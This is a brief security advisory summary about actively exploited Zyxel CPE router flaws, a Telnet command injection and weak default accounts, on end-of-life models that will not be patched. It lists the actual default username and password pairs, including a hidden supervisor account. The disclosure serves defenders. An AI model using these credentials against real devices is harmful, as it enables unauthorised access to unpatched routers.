Security researchers have identified serious vulnerabilities in Zyxel CPE Series devices that are currently being exploited by attackers. VulnCheck discovered two significant flaws in July 2024, with GreyNoise confirming active exploitation attempts.

Key Vulnerabilities:

1. CVE-2024-40891:
– Allows authenticated users to exploit Telnet command injection
– Stems from improper command validation in libcms_cli.so
– Enables arbitrary code execution through shell metacharacters

2. CVE-2025-0890:
– Involves weak default credentials (admin:1234, zyuser:1234, supervisor:zyad1234)
– Supervisor account possesses hidden privileges with full system access
– zyuser account can exploit CVE-2024-40891 for remote code execution

Impact and Exposure:
– Over 1,500 affected devices exposed to internet
– Impacts multiple end-of-life (EOL) products
– Affected models include VMG1312-B10A/B/E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500

Zyxel’s Response:
– No patches will be issued for affected devices
– Company recommends replacing devices with newer models
– Confirms devices reached EOL status years ago

VulnCheck demonstrated successful exploitation against VMG4325-B10A running firmware version 1.00(AAFR.4)C0_20170615, highlighting the urgent need for users to upgrade their devices to maintain network security.